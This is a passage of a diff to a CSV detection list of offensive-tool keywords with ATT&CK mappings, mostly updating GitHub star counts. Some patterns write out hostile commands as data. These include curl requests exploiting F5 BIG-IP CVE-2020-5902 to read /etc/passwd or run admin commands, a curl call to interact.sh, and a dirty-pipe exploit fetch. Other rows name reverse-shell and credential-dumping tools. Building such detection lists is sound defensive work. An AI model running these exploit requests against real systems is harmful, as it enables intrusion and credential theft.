T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" -"*cSploit-*.apk*","offensive_tool_keyword","csploit","The most complete and advanced IT security professional toolkit on Android.","T1555 - T1569 - T1210","TA0002 - TA0003 - TA0009","N/A","N/A","Frameworks","https://github.com/cSploit/android","1","1","N/A","N/A","10","3108","1130","2022-09-02T00:16:04Z","2014-10-04T05:53:29Z" -"*cSploit/android*","offensive_tool_keyword","csploit","The most complete and advanced IT security professional toolkit on Android.","T1555 - T1569 - T1210","TA0002 - TA0003 - TA0009","N/A","N/A","Frameworks","https://github.com/cSploit/android","1","1","N/A","N/A","10","3108","1130","2022-09-02T00:16:04Z","2014-10-04T05:53:29Z" +"*cSploit-*.apk*","offensive_tool_keyword","csploit","The most complete and advanced IT security professional toolkit on Android.","T1555 - T1569 - T1210","TA0002 - TA0003 - TA0009","N/A","N/A","Frameworks","https://github.com/cSploit/android","1","1","N/A","N/A","10","3110","1131","2022-09-02T00:16:04Z","2014-10-04T05:53:29Z" +"*cSploit/android*","offensive_tool_keyword","csploit","The most complete and advanced IT security professional toolkit on Android.","T1555 - T1569 - T1210","TA0002 - TA0003 - TA0009","N/A","N/A","Frameworks","https://github.com/cSploit/android","1","1","N/A","N/A","10","3110","1131","2022-09-02T00:16:04Z","2014-10-04T05:53:29Z" "*csprecon -*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" -"*CS-Remote-OPs-BOF*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*csrf_to_beef*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*CSSG_load.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","554","107","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" +"*CS-Remote-OPs-BOF*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*csrf_to_beef*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*CSSG_load.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","555","108","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" "*cs-token-vault.git*","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","1","N/A","10","10","128","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" -"*CT_Indirect_Syscalls.c*","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","67","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z" -"*CT_Indirect_Syscalls.exe*","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","67","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z" -"*CT_Indirect_Syscalls.sln*","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","67","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z" -"*CT_Indirect_Syscalls.vcxproj*","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","67","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z" -"*ctfr.py*","offensive_tool_keyword","ctfr","Abusing Certificate Transparency logs for getting HTTPS websites subdomains.","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0010","N/A","N/A","Information Gathering","https://github.com/UnaPibaGeek/ctfr","1","0","N/A","N/A","10","1792","281","2022-05-03T12:59:37Z","2018-03-06T01:14:28Z" +"*CT_Indirect_Syscalls.c*","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","68","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z" +"*CT_Indirect_Syscalls.exe*","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","68","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z" +"*CT_Indirect_Syscalls.sln*","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","68","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z" +"*CT_Indirect_Syscalls.vcxproj*","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","68","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z" +"*ctfr.py*","offensive_tool_keyword","ctfr","Abusing Certificate Transparency logs for getting HTTPS websites subdomains.","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0010","N/A","N/A","Information Gathering","https://github.com/UnaPibaGeek/ctfr","1","0","N/A","N/A","10","1793","281","2022-05-03T12:59:37Z","2018-03-06T01:14:28Z" "*ctftool*","offensive_tool_keyword","ctftool","This is ctftool. an interactive command line tool to experiment with CTF. a little-known protocol used on Windows to implement Text Services. This might be useful for studying Windows internals. debugging complex issues with Text Input Processors and analyzing Windows security.","T1547.001 - T1059 - T1057","TA0001 - TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/taviso/ctftool","1","0","N/A","N/A","10","1626","278","2021-09-17T21:02:25Z","2019-06-07T03:39:10Z" "*cube0x0/LdapSignCheck*","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","10","10","148","22","2022-10-25T13:36:43Z","2022-02-24T20:25:31Z" "*cube0x0/MiniDump*","offensive_tool_keyword","onex","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","1","N/A","N/A","3","263","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z" @@ -8979,11 +9127,11 @@ "*curl -sk 'https://*/tmui/login.jsp/.. /tmui/util/getTabSet.jsp?tabId=Vulnerable*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*curl -v -k 'https://*/tmui/login.jsp/.. /tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","4","377","112","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z" "*curl -v -k 'https://*/tmui/login.jsp/.. /tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","4","377","112","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z" -"*curl*.interact.sh*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C3","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2675","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" +"*curl*.interact.sh*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C3","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" "*curl*/tmp/exploit-dirty-pipe*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/carlosevieira/Dirty-Pipe","1","1","N/A","N/A","1","8","5","2022-03-07T21:01:15Z","2022-03-07T20:57:34Z" -"*curlshell.py*","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","N/A","10","10","269","28","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z" -"*cursed chrome","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*cursed cookies","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*curlshell.py*","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","N/A","10","10","272","29","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z" +"*cursed chrome","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*cursed cookies","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*custom_payload_generator.*","offensive_tool_keyword","cobaltstrike","Various Aggressor Scripts I've Created.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/offsecginger/AggressorScripts","1","1","N/A","10","10","141","31","2022-01-01T19:04:27Z","2018-11-30T03:14:45Z" "*CustomKeyboardLayoutPersistence*","offensive_tool_keyword","cobaltstrike","Achieve execution using a custom keyboard layout","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/NtQuerySystemInformation/CustomKeyboardLayoutPersistence","1","1","N/A","10","10","156","30","2023-05-23T20:34:26Z","2022-03-13T17:43:29Z" "*CVE-*.bash*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0008 - TA0009 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","1","N/A","N/A","2","184","113","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" @@ -9009,16 +9157,16 @@ "*CVE*/exploit.sh*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*CVE_*_exploited.txt*","offensive_tool_keyword","POC","A Safer PoC for CVE-2022-22965 (Spring4Shell)","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/colincowie/Safer_PoC_CVE-2022-22965","1","1","N/A","N/A","1","45","7","2022-05-27T12:56:40Z","2022-03-31T16:58:56Z" "*cve_2_MSF_exploit_Mapping*","offensive_tool_keyword","Xerror","fully automated pentesting tool","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Chudry/Xerror","1","1","N/A","N/A","5","458","106","2022-12-08T04:33:03Z","2019-08-16T21:20:52Z" -"*CVE_20*.dll*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","402","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" -"*cve_2019_0708_bluekeep_fail*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*cve_2019_0708_bluekeep_pass*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - 